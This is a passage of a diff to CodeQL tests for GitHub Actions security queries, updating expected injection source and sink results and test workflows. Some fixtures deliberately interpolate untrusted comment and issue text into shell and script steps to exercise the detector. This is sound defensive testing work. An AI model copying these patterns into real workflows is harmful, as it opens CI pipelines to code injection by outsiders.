.github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index f30db9af92f..bf52da395fe 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -13,14 +13,18 @@ query predicate jobNodes(Job s) { any() } query predicate stepNodes(Step s) { any() } +query predicate runNodes(Run s) { any() } + +query predicate runExprNodes(Run s, ExpressionNode e) { e = s.getScript().getAnExpression() } + query predicate allUsesNodes(Uses s) { any() } query predicate stepUsesNodes(UsesStep s) { any() } query predicate jobUsesNodes(UsesStep s) { any() } -query predicate usesSteps(Uses call, string argname, Expression arg) { - call.getArgument(argname) = arg +query predicate usesSteps(Uses call, string argname, AstNode arg) { + call.getArgumentExpr(argname) = arg } query predicate runSteps(Run run, string body) { run.getScript().getValue() = body } diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected index 51fb9314685..31e367ac317 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected @@ -1,15 +1,15 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | -| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | -| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | -| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | -| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | -| action1/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | semmle.label | steps.replace.outputs.value | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths #select -| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | Sink | -| action1/action.yml:35:12:35:51 | echo "H ... et }}." | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | Sink | +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 7bea4429e56..6540b191068 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected @@ -1,12 +1,12 @@ edges -| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | -| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | -| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | nodes -| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | semmle.label | ${{ ste ... inted}} | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | -| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | subpaths #select -| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 6496731dd6b..063a26bd6ef 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected @@ -1,12 +1,12 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | -| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | -| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | -| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | semmle.label | ${{ ste ... cted }} | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | -| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths #select -| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | Summary | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index c9e26d368df..a45b9acf416 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -1,8 +1,8 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| | +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | subpaths #select -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Sink | +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 8d091b65547..2cabeaca9fa 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected @@ -1,12 +1,12 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | nodes -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | semmle.label | jobs.job1.outputs.job-output2 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | semmle.label | steps.step2.outputs.all_changed_files | | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | subpaths #select -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | Source | +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index ae21052dcfe..a6be99e1bd0 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected @@ -1,16 +1,16 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | semmle.label | steps.step1.outputs.step-output | | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | subpaths #select -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | Summary | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml index 17ead9fdd20..977dccc1b85 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml @@ -5,7 +5,9 @@ jobs: runs-on: ubuntu-latest steps: - run: | + Foo echo '${{ github.event.comment.body }}' + Bar echo-chamber2: runs-on: ubuntu-latest @@ -25,4 +27,4 @@ jobs: script: console.log('${{ github.event.issue.body }}') - uses: actions/github-script@v3 with: - script: console.log('${{ github.event.issue.title }}') \ No newline at end of file + script: console.log('${{ github.event.issue.title }}') diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml index 0a64e47f6cb..8968f629dfb 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml @@ -7,4 +7,6 @@ jobs: runs-on: ubuntu-latest steps: - run: | - echo '${{ github.event.comment.body }}' + LINE 1 echo '${{ github.event.comment.body }}' + LINE 2 echo '${{github.event.issue.body}}' + LINE 3 echo '${{ github.event.comment.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index 9d00212e3af..c9ac215666f 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -1,260 +1,261 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | -| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | 